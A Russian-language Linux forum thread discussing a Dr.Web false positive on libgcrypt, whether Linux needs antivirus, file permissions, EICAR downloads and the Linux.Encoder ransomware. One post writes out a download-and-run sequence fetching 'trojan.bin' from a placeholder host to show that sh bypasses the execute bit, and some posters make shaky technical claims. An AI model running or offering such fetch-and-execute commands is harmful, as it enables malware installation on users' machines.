О вирусах в Линуксе

[Barmalei]

Сидел на каком то сайте. Все прочитал. Закрываю браузер и вылетает вот такая шняга.
А говорят нет троянов для Линя. Или это ложняк и смело писать Доктору?

[DELTA-79]

Одно только название "DrWEB" у меня уже не вызывает доверия: Он уже давно был замечен на том, что "ловил" вирусы для линукса. и даже называл файл, в котором он может храниться, мол если замечена длина больше чем N, значит там вирус, вот только этот файл был обязан быть не меньше длинны N. Вот не помню тот сайт, даже на этом форуме как то обсуждался... К тому же, учитывая местонахождение этого вируса, вы явно работаете под ROOTом

[PastorDi]

В irc где-то сидели?

Другой бэкдор для Mac OS X — Mac.BackDoor.Tsunami — является адаптированной под архитектуру Apple версией троянца для Linux с названием Linux.BackDoor.Tsunami. Злоумышленники управляют им с использованием протокола IRC (Internet Relay Chat).

[VictorR2007]

Обычно они на сайтах с порнухой.
Дайте адрес, что-бы нам не нарваться и заранее обходить этот сайт.

[PastorDi]

Нормальный антивирь Dr.Web.

[Barmalei]

Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.

[PastorDi]

Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.

Лучше сразу отослать им этот файлик через сайт. Ну и систему бы всю проверить антивирем, малоли где еще он засел.

[Barmalei]

Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.

Лучше сразу отослать им этот файлик через сайт. Ну и систему бы всю проверить антивирем, малоли где еще он засел.

Если еще найду его. Может быть придется вас просить выложить этот файл.

[notauser]

Если найдете файл, в чём я сильно сомневаюсь, то на проверку в https://www.virustotal.com/ru/ Да и сравнить с файлом из соответствующего пакета нужно обязательно.

[Barmalei]

Карантина не нашел. Доктор молчит. Может дадите этот файл мне?

[VictorR2007]

Карантина не нашел. Доктор молчит. Может дадите этот файл мне?

Вам его и не найти, судя по сообщению на картинке.
Там нет сообщения, что в карантине.

[VictorR2007]

А что за антивирус?
Вроде он у вас в режиме демона и постоянной защиты.
Уже много лет не следил за эти софтом.

[Barmalei]

Ложняк сказали. Но как теперь искать этот файл.

[notauser]

Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.

[Barmalei]

Скачайте пакет с файлом из реп, распакуйте и скопируйте в /usr/lib64

А подробней можно? где искать репы? я дистр вскрыл ничего не нашел.

[notauser]

http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm

[Barmalei]

http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm

Спасибо. Я рылся так и не нашел.

[PastorDi]

Скачайте пакет с файлом из реп, распакуйте и скопируйте в /usr/lib64

А подробней можно? где искать репы? я дистр вскрыл ничего не нашел.

Проще так будет:

Код: Выделить всё

urpmi --replacepkgs lib64gcrypt20

[notauser]

Для этого нужно систему загрузить (хотя бы грамотно chroot) и знать что нужный файл из этого пакета lib64gcrypt20

[Barmalei]

Проще так будет:

Код: Выделить всё

urpmi --replacepkgs lib64gcrypt20

Ваш вариант не прошел.

[Barmalei]

Для этого нужно систему загрузить (хотя бы грамотно chroot) и знать что нужный файл из этого пакета lib64gcrypt20

Скопировал, система загрузилась, но доктор съел файл. Сейчас отрубил его и снова скопировал. Все работает.

Всем спасибо. А доктору минус.

[notauser]

Проще так будет:

Код: Выделить всё

urpmi --replacepkgs lib64gcrypt20

Ваш вариант не прошел.

Естественно.
libgcrypt это LGPL-библиотека шифрования — библиотека времени выполнения
libgcrypt включает в себя функции шифрования. В ней реализовано множество
важных свободных шифров, хеш-алгоритмов и алгоритмов подписи публичных
ключей:
Arcfour, Blowfish, CAST5, DES, AES, Twofish, Serpent, rfc2268 (rc2), SEED,
Camellia, IDEA, Salsa, CRC, MD4, MD5, RIPE-MD160, SHA-1, SHA-256, SHA-512,
Tiger, Whirlpool, DSA, DSA2, ElGamal, RSA, ECC.

[notauser]

Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.

[Barmalei]

Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.

Я бесплатно тестирую его.
А какие защиты в Линукс?
Фаервол по дефолту. Root пасс и сижу под пассовым юзвером.

[PastorDi]

Трояны уже вшиты в линукс! Чё вы так волнуетесь?

[Галахов Роман]

Трояны уже вшиты в линукс! Чё вы так волнуетесь?

Неправильный перевод или реально есть такой скрипт? У себя посмотрел тоже есть такое

Так, что это не розыгрыш, а Реальный союз Linux c вирусами - любой антивирус сойдет с ума, лучше их не ставить

[keleg]

Это реальная фишка с таким названием.
Cisco Secure Desktop aka Cisco Trojan
Возможно, изменим перевод на менее пугательный.

[law]

Трояны уже вшиты в линукс! Чё вы так волнуетесь?

Неправильный перевод или реально есть такой скрипт? У себя посмотрел тоже есть такое

Как автор этого перевода уверяю вас, что перевод правильный и такой скрипт (точнее бинарник) реально есть.
Вот такая строка была в оригинале:
"Allow Cisco Secure Desktop &trojan"

Вот такое можно найти к этому описание:
The 'Cisco Secure Desktop' is a bit of a misnomer — it works by downloading a trojan binary from the server and running it on your client machine to perform some kind of 'verification' and post its approval back to the server.

Таким образом, трояны не вшиты в Linux, но если кому-то сильно хочется (без этого нельзя подключиться к Cisco Secure Desktop), то они поддерживаются.

[slavyanix]

заговорили о троянах в линукс и почему то все забыли о самой сильной защите линукса от вирусов - это права доступа. попробуйте скачать файл , любой бинарь под линь и глянуть что у него там в правах стоит.)) уверяю о антивирусах забудете сразу.)))

[notauser]

suid (setuid setgid)
Весь вопрос в механизмах распространения.

[slavyanix]

setgid и прочие уже второстепенны и отражают только внутреннюю безопасность в системе. за ними безусловно нужен глаз да глаз, но первичные права на запуск говорят обо всем. любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)) вот так и построена защита линукса. есть только одна проблема - дыры в запущенных программах, но их еще нужно суметь проэксплуатировать)) а это уже взлом системы практически вручную, а не вирус. к тому же ту еще много преград.

[notauser]

> любой файл скачанный из сети не имеет прав на запуск
Вы точно это знаете? В смысле это не зависит от файловой системы и опций её монтирования?

[slavyanix]

я работаю с ext системами и как поведет себя btrfs и прочие не знаю. экспериментов не ставил. но можно будет проверить.)) а с ext системами такая защита присутствует очень давно. я застал использование еще ext2)) а вот в других не было необходимости, так что полагаю тут нужно проверять на практике.

[notauser]

Ух ты. Ну если Вы ещё застали и перипетии с ELF, то зачем Вы всё это так непонятно пишите?

[slavyanix]

ну мне было лет 18)) а любопытен я был чрезмерно.)) так что да поначалу промышлял для удовольствия изучением операционных систем и поиска их слабых мест.)) и на тот момент нормальной альтернативы ext в линуксе и не было. и да были elf файлы. потом от них избавились, точнее перешли на другое. там и правда был гемор, но ничего страшного, только для тех кто не смог обеспечить нормального доступа к ним. и да до сих пор из-за прав доступа линукс можно отстроить как непробиваемую стену. но кто этим ща занимается. но многое по умолчанию сделано вполне грамотно. потом у меня как то запал иссяк и я уже не так ковырял сиистему, да и фс появились в избытке с вполне нормальной работой в линксе. впрочем я до сих пор не ощущаю необходимости в других фс. ext вполне на уровне. обычному пользователю не имеет смысла искать что то еще. это скорее удел профи админов под конкретный сервак.))

[Barmalei]

setgid и прочие уже второстепенны и отражают только внутреннюю безопасность в системе. за ними безусловно нужен глаз да глаз, но первичные права на запуск говорят обо всем. любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)) вот так и построена защита линукса. есть только одна проблема - дыры в запущенных программах, но их еще нужно суметь проэксплуатировать)) а это уже взлом системы практически вручную, а не вирус. к тому же ту еще много преград.

понятно. но я решил для Вынь качать и проверять проги на Линь. Для Вынь будет безопасней.
сегодня тока на почту якобы от банка пришел баланс в exe файле. отправил сразу в вирлаб, подозреваю что там шифровальщик был.

[slavyanix]

да экзешник лучше проверить.

[notauser]

> но я решил для Вынь качать и проверять проги на Линь
Несмотря на жаргон, я понял что вы хотели сказать. Так и ставте соответствующие решения. А не антивирус для домохозяйки у которой вдруг Linux. Расчет простой: Вот вам анивирь - купите. Не нужен, говорят безопасная система - так в ней вирус - долой - не работает - так был вирус - какой - плохой - все пропало, но мы вас спасли - купите Windows - так в ней вирус - долой - работает. +1 клиент. Barmalei , Вы проверьте на https://www.virustotal.com/ru/ Думаю там dr промолчит.

[slavyanix]

ну думаю проверять вирусы для вынь на линуксе неплохая идея, но антивирь тогда нужен нормальный. и тут надо озадачится вопросом что в линь лучше проверяет на вирусы. не обязательно же платные антивири будут лучше. уверен есть хорошие бесплатные аналоги. в любом случае улучшего антивиря процент отлова где то 97-98%. увы 2% что проскочит.

[notauser]

>Так и ставте соответствующие решения
> ну думаю проверять вирусы для вынь на линуксе неплохая идея, но антивирь тогда нужен нормальный.
Вендоры предлагают линейку решений - для шлюза, почтового сервера, etc и используют в них, в смысле решениях, "Linux-технологии". И это работает. Но защищает пользователей Windows.

[notauser]

>Вы проверьте на https://www.virustotal.com/ru/ Думаю там dr промолчит.
Сам отправил.
SHA256: 916ab9e74cc478a14bc80bf5557df9a851667a6876ab9c071cac678ffce0c0a0
Имя файла: libgcrypt.so.20.0.1
Показатель выявления: 0 / 57
Дата анализа: 2015-03-26 19:57:07 UTC (0 минут назад)
Делайте выводы. А лучше спросите напрямую почему такой результат при сигнатурном анализе. И пусть не говорят про что-то другое в Linux.

[notauser]

Трояны уже вшиты в линукс! Чё вы так волнуетесь?

Linux == вирус

[keleg]

Линукс - распределенный многопользовательский кооперативный конструктор с элементами квеста, а никакой не вирус!

[Yamah]

любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)).

Код: Выделить всё

cd
wget -c http://somebody.com/trojan.bin
sh ~/trojan.bin

Главное убедить программу, занесшую trojan.bin на ПК выполнить последнюю команду.

[Yamah]

но я решил для Вынь качать и проверять проги на Линь. Для Вынь будет безопасней.

Единственный еще рабочий виндовый антивирус в организации у нас ClamWin с мордашкой к нему. Нужен больше для успокоения пользователей, чем реальная помощь админу. В Cydwin еще и ClamAV есть.
Для проверки небольших программ есть ВирусТоталь, для больших - оффсайт и ClamAV под RELS.

[viktor]

> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"

[БольшойКомпьютер]

Извините за оффтоп, и спасибо за хорошее настроение к вечеру!))

[slavyanix]

> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"

попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))

[Yamah]

попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))

Со скриптами проканывает.

Код: Выделить всё

ls -l
итого 4
-rw-rw-r-- 1 yamah yamah 303 апр  1 08:47 autoiconv.sh
[yamah@admin Tools]$ sh autoiconv.sh
True

С бинарями нет.
Но напакостить и скриптами можно. В том числе и разрешить исполнение.

[viktor]

> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"

попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))

Сам попробуй. Я знаю.
Вот содержимое файла дла опытов, например
#! /bin/bash
zenity --question --text "`ls`"

[Barmalei]

Ммм, интересно в браузере антивирус есть? Кто блокирует так на подлете еще? DrWeb точно не умеет.

[PastorDi]

Вот: http://rusnovosti.ucoz.com/publ/interne ... ar/4-1-0-6
У Вэбера нету разве плагина к FF ?
И насколько я знаю, Вэбер в фоновом режиме вашу сеть мониторит. Так что... все нормально.

[Barmalei]

Вот: http://rusnovosti.ucoz.com/publ/interne ... ar/4-1-0-6
У Вэбера нету разве плагина к FF ?
И насколько я знаю, Вэбер в фоновом режиме вашу сеть мониторит. Так что... все нормально.

Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.

[Галахов Роман]

Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.

Какие плагины для FF установлены? И можно ссылку на страницу с этими файлами? Антивирусами не пользуюсь. Интересно проверить

[Barmalei]

Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.

Какие плагины для FF установлены? И можно ссылку на страницу с этими файлами? Антивирусами не пользуюсь. Интересно проверить

Это тестовый для проверки антивирусов. Он и для Андроида есть. На этой странице внизу http://www.eicar.org/85-0-Download.html
Блокируются только те которые про http, по https скачиваются.
Плагинов вроде бы никаких антивирусных нет, только медийные.

[Галахов Роман]

Это тестовый для проверки антивирусов. Он и для Андроида есть. На этой странице внизу http://www.eicar.org/85-0-Download.html
Блокируются только те которые про http, по https скачиваются.
Плагинов вроде бы никаких антивирусных нет, только медийные.

Скачал все 8 файлов без проблем

Думайте...

[Barmalei]

Ладно. Скоро снесу DrWeb и проверю.

[PastorDi]

Ладно. Скоро снесу DrWeb и проверю.

На сколько я знаю, Dr.Web в Винде ставит свою "прослойку" на сетевом уровне, между выходом пакетов в сеть и winsok.Winsok в Винде последняя/первая инстанция через которую все пакеты идут в/из сети. По этому он все грубо говоря снифит. Может и в линуксе он тоже так же работает. А https трафик он не расшифровывает. По этому через https все скачивается. Значит отлично Dr.Web работает! Радуйтесь!

[Barmalei]

Ладно. Скоро снесу DrWeb и проверю.

На сколько я знаю, Dr.Web в Винде ставит свою "прослойку" на сетевом уровне, между выходом пакетов в сеть и winsok.Winsok в Винде последняя/первая инстанция через которую все пакеты идут в/из сети. По этому он все грубо говоря снифит. Может и в линуксе он тоже так же работает. А https трафик он не расшифровывает. По этому через https все скачивается. Значит отлично Dr.Web работает! Радуйтесь!

Удалил DrWeb. Кто то дальше блокирует.

[Галахов Роман]

Удалил DrWeb. Кто то дальше блокирует.

Думаю, все-таки FF работает. Видимо, какой-то плагин. Можете сделать скрин страницы с плагинами, как я, чтобы сравнить? Если я установлю плагины, которых у меня нет, а у вас есть - будет ли блокировка?

[*d0s]

http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm

Спасибо. Я рылся так и не нашел.

Код: Выделить всё

$ urpmf libgcrypt.so.20.0.1
lib64gcrypt20:/usr/lib64/libgcrypt.so.20.0.1
libgcrypt20:/usr/lib/libgcrypt.so.20.0.1

$ urpmq --sources lib64gcrypt20
http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/media/main/release/lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm

$ urpmq --sources libgcrypt20
http://mirror.rosalab.ru/rosa/rosa2014.1/repository/i586/media/main/release/libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

$ wget http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/media/main/release/lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm http://mirror.rosalab.ru/rosa/rosa2014.1/repository/i586/media/main/release/libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

$ ark -d lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm
$ ark -d libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

[*d0s]

ClamAV интересно себя ведет. Ранее на многих дистрибутивах в основном ругался на man & ruby, когда была версия 0.94/0.95.
Теперь когда 0.96/0.97 ругается на это (см. вложение)

[Barmalei]

Удалил DrWeb. Кто то дальше блокирует.

Думаю, все-таки FF работает. Видимо, какой-то плагин. Можете сделать скрин страницы с плагинами, как я, чтобы сравнить? Если я установлю плагины, которых у меня нет, а у вас есть - будет ли блокировка?

Только мультимедиа.

[Галахов Роман]

Только мультимедиа.

Странно... Установил ваши расширения:

И снова все скачал...
Брандмауэр/Firewoll включен?
Через другие браузеры (хромиум, опера...) - пробовали?

[Barmalei]

Только мультимедиа.

Странно... Установил ваши расширения:

пкйц6.png

И снова все скачал...
Брандмауэр/Firewoll включен?
Через другие браузеры (хромиум, опера...) - пробовали?

Брандмауэр/Firewoll не трогал, все по дефолту как установил. Других браузеров не имею.
Фиг с ним. Пусть блокириует. Это все таки +.

[Barmalei]

Нашел кто блокирует этот файл. Вот он в самом браузере.

[Галахов Роман]

Этот пункт у меня всегда включен, но это не помешало скачать те файлы.

[Barmalei]

Этот пункт у меня всегда включен, но это не помешало скачать те файлы.

Я его выключил и скачал, с ним блокирует.

[Галахов Роман]

Я его выключил и скачал, с ним блокирует.

Очень странно... При одних и тех же настройках FF срабатывает по разному...

[*d0s]

Этот пункт у меня всегда включен, но это не помешало скачать те файлы.

Я его выключил и скачал, с ним блокирует.

А что в справка - информация для решения проблем

[PastorDi]

Я его выключил и скачал, с ним блокирует.

Очень странно... При одних и тех же настройках FF срабатывает по разному...

Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.

[Barmalei]

Очень странно... При одних и тех же настройках FF срабатывает по разному...

Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.

Прослойка Доктора не блокирует, а ловит и ложит в карантин.
Врядли она осталась. Специально проверил, поиск по drweb дал 0 результат.

[PastorDi]

Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.

Прослойка Доктора не блокирует, а ловит и ложит в карантин.
Врядли она осталась. Специально проверил, поиск по drweb дал 0 результат.

Не по слову "drweb" ничего не найдете. Он при установке навреняка либу свою утановил, и где-то прописал на транспортном уровне. При удалении, вы просто внешнюю граф.часть удалили да и все. А эта либа где-то "сидит".
На Винде я наблюдал таку штуку (давно), когда Dr.Web ставится, он подменяет winsok.dll на свой. (видимо пропатченый для слежения иперехвата). Но это давно было. Хотя, может такую же технологию они до сих пор используют. И на линуксе тоже, весь все либы сетевые в открытом доступе.
Можно посоветовать что? Переустановить сетевые пакеты, типа urpmi --replacepkg <пакет>. Тогда с реп, переставятся либы сетевые в чистом виде. И все будет в нормальном режиме работать.

[Barmalei]

Нет никакой прослойки у DrWeb которая блокирует прямо в браузере. Там стоит антивирус и ловит во время скачивания.
Больше я спорить не буду. Это все делает FF, потому что антивирус точно к этому пункту в FF не прилепят они. А почему у вас не робит я не знаю.
Все о защите в FF https://support.mozilla.org/ru/kb/kak-r ... ta-ot-vred

[*d0s]

Может где-то запись имеется как по этому сценарию http://forum.rosalab.ru/viewtopic.php?f=53&t=5569
Например тут - /etc/ld.so

[ans]

Троян Linux.Encoder заразил около 2000 сайтов
Компания «Доктор Веб» в четверг сообщила новые подробности о троянце, получившем наименование Linux.Encoder.1, о котором впервые сообщалось в начале ноября.
http://news.softodrom.ru/ap/b23592.shtml

[Delles]

новые подробности

«Получив несанкционированный доступ к сайту, киберпреступники размещали на нем...»

М.б. не допускать несанкционированный доступ к сайту?

[notauser]

Троян Linux.Encoder заразил около 2000 сайтов
Компания «Доктор Веб» в четверг сообщила новые подробности о троянце, получившем наименование Linux.Encoder.1, о котором впервые сообщалось в начале ноября.
http://news.softodrom.ru/ap/b23592.shtml

12 ноября 2015 года
Ранее (9) bitdefender http://labs.bitdefender.com/2015/11/lin ... ption-key/ утер "доктора", предлагая расшифровщик бесплатно всем желающим. "Доктор" сделал выводы, и сообщил буквально "сохраняется вероятность того, что злоумышленники со временем могут модифицировать используемые ими алгоритмы шифрования, устранив все «слабые места». Поэтому серьезная опасность потерять важные файлы сохраняется даже для пользователей такой относительно безопасной ОС, как Linux, и в первую очередь — для администраторов веб-сайтов, работающих под управлением популярных систем управления контентом. Напоминаем, что сигнатура Linux.Encoder.1 добавлена в базы Антивируса Dr.Web для Linux. Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации." http://news.drweb.ru/show/?i=9699&c=5&lng=ru&p=0
Делайте выводы.

[slavyanix]

Со скриптами проканывает.

Код: Выделить всё

ls -l
итого 4
-rw-rw-r-- 1 yamah yamah 303 апр  1 08:47 autoiconv.sh
[yamah@admin Tools]$ sh autoiconv.sh
True

С бинарями нет.
Но напакостить и скриптами можно. В том числе и разрешить исполнение.[/quote]
это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

[notauser]

это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

https://ru.wikipedia.org/wiki/Bashdoor

[slavyanix]

ты мне поясни как ты собрался автоматом после скачки его запустить_)) браузер не запустит а скачкой в консоли редко кто занимается. и тогда надо создавать последовательность команд, хотя бы в одной строке.

[Xakep]

Сейчас проверил файл который упоминается в шапке темы через VirusTotal.
И тут DrWeb обложался на фоне всех остальных антивирусов...

[notauser]

Что то это за файл знаете? Компания «Доктор Веб», Linux.Encoder.1. Ну, вы поняли

[Barmalei]

Сейчас проверил файл который упоминается в шапке темы через VirusTotal.
И тут DrWeb обложался на фоне всех остальных антивирусов...

картинка13.jpeg

На Вирустотал факторов много, не один DrWeb виноват. У меня пролетели все мигом.

[notauser]

"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

[Алзим]

"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.

[Barmalei]

"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.

Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?

[Алзим]

Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?

Я уверен в том, что Касперский, хоть он и паранойк и ресурсы системы потребляет, но вирусу ловить способен. А Вебер, ну если только какие-нибудь сделанные студентами-первокурсниками или ими самими.

[Barmalei]

Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?

Я уверен в том, что Касперский, хоть он и паранойк и ресурсы системы потребляет, но вирусу ловить способен. А Вебер, ну если только какие-нибудь сделанные студентами-первокурсниками или ими самими.

Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.

[notauser]

ты мне поясни как ты собрался автоматом после скачки его запустить_)) браузер не запустит а скачкой в консоли редко кто занимается. и тогда надо создавать последовательность команд, хотя бы в одной строке.

это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

Не, это ты мне поясни свою уверенность. Был apturl, например, а всякие java и сейчас есть. Это про браузер. По ссылке выше - в основном про сервер, но есть и "Атака на DHCP-клиент". Для домашнего десктопа не сильно актуально, да. Про прокладку

И бита x у него нет. Это я к чему. http://forum.rosalab.ru/viewtopic.php?f ... 319#p41146 не панацея.
UPD Скачал *.tar.xz, распаковал (GUI) и install.sh имеет бит x. Правда по 2клику - то же окно. И да, ext4.

[Алзим]

Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.

Касперский сразу надо ставить на только что установленную систему. Впрочем, как и все остальные антивирусы.
Касперский у меня долго стоял. Он какое-то время на Яндексе был бесплатный.
А вычищать — это значит настроено где-то неправильно.
А Вебер у многих знакомых был — решето. Я когда приходил, сразу его сносил и бесплатного Касперского ставил.

[notauser]

"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.

Это цитата с их сайта.

[Barmalei]

Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.

Касперский сразу надо ставить на только что установленную систему. Впрочем, как и все остальные антивирусы.
Касперский у меня долго стоял. Он какое-то время на Яндексе был бесплатный.
А вычищать — это значит настроено где-то неправильно.
А Вебер у многих знакомых был — решето. Я когда приходил, сразу его сносил и бесплатного Касперского ставил.

На вкус и цвет товарищей нет. Ни разу не приходилось чистить под Доктором.
В некоторой степени все же виноваты сами юзверы.

[Алзим]

В некоторой степени все же виноваты сами юзверы.

Вот на этой фразе давайте и остановимся.
Только, не в какой-то степени, а чаще всего, в самой основной степени.
У меня есть знакомый, которому никакой антивирус не поможет. Он устанавливает на комп всё, что на сайтах скажут. Похоже, он знает только одну кнопочку «ОК». И даже то, что он периодически переустанавливает Винду, это не помогает. Он продолжает упрямо соглашаться и ставить всё, что ему предлагают в сети.

[Delles]

Только непонятно, слова "несанкционированный доступ к сайту" имеют какое-то значение или нет? Во-первых, если нет "несанкционированного доступа к сайту", нет и этого вируса. Во-вторых, у нас не сайты, а обычные компы.

[Barmalei]

Только непонятно, слова "несанкционированный доступ к сайту" имеют какое-то значение или нет? Во-первых, если нет "несанкционированного доступа к сайту", нет и этого вируса. Во-вторых, у нас не сайты, а обычные компы.

Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.

[Andersen]

Какие антивирусы?Зачем?Для дополнительных тормозов и глюков?На виндовсе держите эти программы-там иногда бывает не лишними...

[Delles]

Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.

Вот именно. А получать доступы не должны. Значит, админы сайтов, не озаботившиеся охраной доступа, получат шифрование данных и затем наладят охрану доступа. А то, что на персональный комп кто-то ① закинет подобный файл и ② побудит его запустить, слишком маловероятно. Впрочем, если удастся, юзер получит шифрование данных и затем озаботится организацией бэкапа (если еще не). Так что всё к лучшему.

[Barmalei]

Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.

Вот именно. А получать доступы не должны. Значит, админы сайтов, не озаботившиеся охраной доступа, получат шифрование данных и затем наладят охрану доступа. А то, что на персональный комп кто-то ① закинет подобный файл и ② побудит его запустить, слишком маловероятно. Впрочем, если удастся, юзер получит шифрование данных и затем озаботится организацией бэкапа (если еще не). Так что всё к лучшему.

Не факт. Бывает и так. У админов трояны просто ничего не заражают, а воруют ФТП доступы и удаляются. А других потом шифруют.
Пирамида некая.

[Delles]

воруют ФТП доступы и удаляются. А других потом шифруют

Всяко админ отвечать должен, и другие тоже бэкап иметь. Я к тому, что ситуация в общем банальна. Если б не пиар Доктора Уеба.